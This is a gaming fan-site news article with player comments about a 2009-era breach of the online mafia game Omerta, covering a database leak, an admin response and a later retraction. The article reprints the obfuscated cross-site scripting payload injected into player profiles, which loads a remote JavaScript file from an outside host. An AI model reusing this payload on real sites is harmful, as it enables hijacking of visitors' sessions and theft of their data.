» Menu

» Login

» OB/Site News

Omerta News Integration
Comments: 58 - Views: 54441 - Votes: 0
War rating
Comments: 10 - Views: 26235 - Votes: 4
Reporters Wanted!
Comments: 2 - Views: 18275 - Votes: 3
» Articles
Date Comments Rating

General Comments & Major Rumors
Comments: 57,979 - Views: 15,715,572 - Votes: 81
Endless Struggle !
Comments: 501 - Views: 16,915 - Votes: 0
23-09 Reset → 30 September 2022, Friday → 12:00 OT
Comments: 68 - Views: 8,747 - Votes: 0
30-09 Welcome to Round #40!
Comments: 2 - Views: 2,087 - Votes: 0
19-09 Congratulations Reichsthaler!
Comments: 0 - Views: 1,999 - Votes: 0
01-09 Not Penny's boat..
Comments: 72 - Views: 17,836 - Votes: 0
21-08 First Family!
Comments: 6 - Views: 2,555 - Votes: 0
12-08 Welcome to Round #39
Comments: 5 - Views: 2,460 - Votes: 0
03-08 Reset → 12 August 2022, Friday → 10:00 OT
Comments: 17 - Views: 5,128 - Votes: 0
27-07 Congratulations Vengeance!
Comments: 8 - Views: 2,650 - Votes: 0
go back
go forward
» Barafranca News

No news found. Reset in progress?
» Online last 15 minutes

Guests: 538
Total members: 3747
Online: 0 (0%)
Members:
22-09 [Upd #2] Omerta hacked
Author: sbanks
Last updated: 4797d 9h 9m 36s ago by LL
Comments: 164
Views: 67,428
Votes: 0 (0 average)
Version: 3.2
article
Last weekend Omerta had some downtime. Admins posted some news that there was something wrong with the server. Some hardware problem as Brando states.

Barafranca News: Connection problems - fixed

By Brando: There was a hardware problem which was solved by switching that machine off.

We're disappointed that the Sysadmin team were not able to find this out earlier and there will be an enquiry.

Sorry for the inconvenience and thanks to Teckna, Paul and Andre, who remained awake fixing this - trying everything in the software - until they finally found that it was an unpredictable physical problem.

Most of your criticisms are accurate and I will conduct an enquiry as to why we did not publicly react sooner.


In reality, hackers had access to the database of Omerta. Due the lack of proper coding on the hitlist page, hackers were able to do a "query" and got into the database of Omerta.

Result? All information you could wish for "could" have been downloaded. This contains: successors, bullet amount, passwords(md5 hashed), emails, testaments.. everything!

After the news post of Brando, the hackers got kind of "pissed/annoyed" that the Admins were trying to cover up what was happening and decided to go public with the information.

They wrote a small tool which would change all profiles ingame. About the same thing what happened versions ago (Stidda <-> Barafranca)

They reached about ~800 profiles before it got noted, and admins disabled images on profiles again.

Barafranca News: Removed Img(s)

onLoad=m=document.createElement(String.fromCharCode( 115,99,114,105,112,116));m.src=String.fromCharCode( 104,116,116,112,58,47, 47,97,46,105,116,115,114,46,114, 117,47,107,110,97,115,50,46,106,115);document.getElementsByTagName( String.fromCharCode(104,101,97,100))[0].appendChild(m)


Translation:
Once page has been loaded, create JavaScript placeholder. Then load and place http://a.itsr.ru/knas2.js in it.


This script loaded an unknown JavaScript file onto the profiles, which may could have been used to cause harm, once the affected profile was loaded. Unfortunately, we don't have the particular JavaScript file, and thus cannot analyse the rest of the intentions of the hackers.

Update:
We now heard the hackers wanted to wait until 2-3k profiles were infected, and then show the database setup all at once on those profiles.

Update:

Just as more proofs, the hackers has released a list of 515 users with their set testament.

Also they released the Global Vars of the server of Barafranca.

Update 28/09:

After six days of silence in the Admins' latest news section and ignoring our invitation to comment on this article with the story from the admins' point of view, the crew of this site has been glined for an undefined amount of time with the message to "contact Brando". Also ingames of our crew have been frozen and at least two have been akilled. Links to our sites are blocked on IRC for now.

Later on the day, a statement has been released on Omerta in which Bramblerose states that last Thursday testament info indeed was obtained through a XSS exploit. Today they have taken measures to protect the players of which this data has been obtained.

They have yet to comment on our accusation that their downtime was linked to the hack we described here, nor have they said anything about the database setup leak, global server variables leak or the profiles infected by JavaScript code.

Update:

One of the hackers has spread a link through our comments, which shows a list of family names and then two lists of user id's who were the successors of the corresponding families at the time of the hack, which is just another proof that the database was accessible completely.

Update 30/09:
We're sorry for connecting the downtime with the hacks, we had no proof for this besides coincidence and a statement from the hackers. We apologise to the Omerta crew for this false information and for saying they were trying to cover the hack up by saying they had hardware problems and thus we retract this accusation.

We also apologise for helping the hackers spread the lists containing testament information and successor information further by linking to them in our article and we sincerely hope that none of the players or families on those lists had any negative consequences thanks to those lists being linked to in our article. We apologise for any of the negative consequences which may have occurred. We're also sorry to the Omerta crew if linking to the lists in our article caused the Omerta crew to have extra worries or had to spend more time on damage control.
comments

Add a YouTube movie Add an image Add a link/url Help
Anonymous (15:35:05 - 28-09)
Link Quote
Media censorship is key to the success of any DIC(K)TATOR :')

Good on the beyond news crew! You backed up your position with facts.
Respect
Rix Netherlands (15:34:06 - 28-09)
Link Quote
Anonymous at 15:28:27 on 28/09:
Btw its posted over 500 on that list, not 100, counted it roughly.
Hmm you're right, it's 515. Dunno why Sbanks said 100.
Anonymous (15:28:27 - 28-09)
Link Quote
Anonymous at 14:36:19 on 28/09:
The xss exploit where the hackers could see who you had set as testament had nothing to do with the hitlist exploit or the broken firewall server.

And the explanation for how the database structure was downloaded ? and the GLOBAL_VARIABLES table was posted here ?

Btw, very nice of admins of setting up and 48 hours protection one week after they told us to remove the injected code from the profiles. People have known about this for an week now, what about that ?. ( Btw its posted over 500 on that list, not 100, counted it roughly. )

For admins: Why ban the reporters after they obivously posted some sence of truth, which is the main object for an real reporter. Just fucking wrong, go do smth useful instead
Entity Netherlands (15:28:02 - 28-09)
Link Quote
Rix at 15:17:41 on 28/09:
Entity at 15:02:13 on 28/09:
But who are behind this hoax anyway?
We don't know, they were anonymous and, logically, wish to stay that way.


Logically it's ind.
Arrogant crew they are, imo they should be thankful for such info.
And they can fix it before they see a public proof.
Rix Netherlands (15:17:41 - 28-09)
Link Quote
Entity at 15:02:13 on 28/09:
But who are behind this hoax anyway?
We don't know, they were anonymous and, logically, wish to stay that way.
Rix Netherlands (15:10:22 - 28-09)
Link Quote
Anonymous at 15:00:14 on 28/09:
so first the crew denies that there is anything wrong, so they call ob devs liars, then they say, yes there was a security hole, but still they ar liars !

right ...
Exactly. I would laugh my ass off if it wasn't so sad.
Entity Netherlands (15:02:13 - 28-09)
Link Quote
Lol first you warned them, and they didn't listen..
The proof is there, and now you are the bad guy Rix..
I bet they blame you for it to lol.
But who are behind this hoax anyway?
Anonymous (15:00:14 - 28-09)
Link Quote
so first the crew denies that there is anything wrong, so they call ob devs liars, then they say, yes there was a security hole, but still they ar liars !

right ...
Anonymous (15:00:04 - 28-09)
Link Quote
So while they "review" the relationship with omerta beyond they already a-killed them while admitting that there was an exploit after all...

And then people often condemn anonymous comments. I don't want my account banned just because I say a few words against omerta crew as my point of view.

Big picture:

1. Omerta beyond makes a news post stating there was an exploit
2. Brando denies enters in confrontation with beyond crew stating poor journalism
3. They close the channel and accounts of all the omerta beyond crew
4. They launch an official statement telling there was an exploit after

Can anyone tell me another game like this so I can start playing? I really enjoy mafia games but not NAZI Mafia games like this.

Anonymous (14:46:14 - 28-09)
Link Quote
Although we regret this a lot we can assure you that there is no need to change your email or passwords cause no one got access to our database.'


Then WTF are these Global var things+ the complete database lay-out that was posted on this site..before being removed a couple of hours ago by sbanks I believe?
Anonymous (14:36:19 - 28-09)
Link Quote
Dear all,

There was a security hole last Thursday which we managed to close within 30 minutes. The xss exploit where the hackers could see who you had set as testament had nothing to do with the hitlist exploit or the broken firewall server.

We were pretty shocked to see how the Omerta Beyond ‘news’ site pasted inaccurate information on their site as being the truth. It’s clearly a sign of bad journalism and Brando contacted them straight away to ask for some clarification.

At the moment we’re reviewing the relationship between Omerta Beyond and the game and we have frozen the accounts of the ones involved with the Omerta Beyond ‘news’ site. If any of them want to be thawed they should contact Brando.

We are aware of the list with ingames/ testaments that’s on that same ‘new’s site. Although we regret this a lot we can assure you that there is no need to change your email or passwords cause no one got access to our database. The hackers got partial access to the accounts only.

Too make sure that the players on this list (and their testaments) won’t get killed hoping for an easy way of getting money we put those accounts in protection mode, which means no one can hire detectives to find them. Too make it even they can’t hire detectives themselves either. This will be automatically removed after 48 hours.

We will keep you posted.

Bramblerose


So now they are just admitting that suddenly a glitch appeared that only showed testamant?
Really?
Jesus christ :')
Anonymous (14:35:57 - 28-09)
Link Quote
LOL Rix. You have been killed by a very, very poor lil kiddo! :')

Time to quit this game people.
Anonymous (14:35:21 - 28-09)
Link Quote
This is going really low...
Rix Netherlands (14:22:00 - 28-09)
Link Quote
Myself:

They killed you, the bastards!
Go To Account Page

Your account was frozen

Your account (Lanzin) was frozen by Bramblerose. Please contact Bramblerose via email: [email protected] or IRC (http://www.mibbit.com/) on irc.barafranca.com.

Kyra:

They killed you, the bastards!
Go To Account Page

Your account (Entropy) was frozen by Bramblerose. Please contact Bramblerose via email: [email protected] or IRC (http://www.mibbit.com/) on irc.barafranca.com.

Srsly admins what the fuck do you want? -_-'

I fucking emailed you 6 hours ago, why don't you just read your inbox instead of akilling us and telling us to mail you?
Anonymous (13:59:20 - 28-09)
Link Quote
Actually Hugobust, you still havent answered my question

how did my personal testament information get on that list that was posted?

Beth ingame
Acidqueen irc

Rix - i was waiting to pounce on you on irc to reset my password, but guess thats pretty impossible atm :x
Anonymous (13:04:25 - 28-09)
Link Quote
Hugobust at 12:01:41 on 28/09:
I'm lauging my ass off about all the comments i got on my reaction.

You really proved my point.

Keep up the news rix :)

Got nothing more to say.

And this proves our point that you and the other devs/admins are incompetent! :)

Taking players feedback and comments seriously and with some respect.... LOL. Missed some parts in your upbringing? :P
Rix Netherlands (12:31:03 - 28-09)
Link Quote
Hugobust at 12:01:41 on 28/09:
Keep up the news rix :)
Kind of hard to do now -_-'

Please tell Brando to respond on my emails I have send him 4 hours ago.
Anonymous (12:08:20 - 28-09)
Link Quote
You didnt have a point, you dont even have an opinion.
You just stated some random comments that had little to do with the subject.
Yet you are to stupid to realise that.
Hugobust (12:01:41 - 28-09)
Link Quote
I'm lauging my ass off about all the comments i got on my reaction.

You really proved my point.

Keep up the news rix :)

Got nothing more to say.
Anonymous (11:31:33 - 28-09)
Link Quote
Are the crewmembers based in north-korea nowadays ?

you say something i dont like, gline :w

way to go !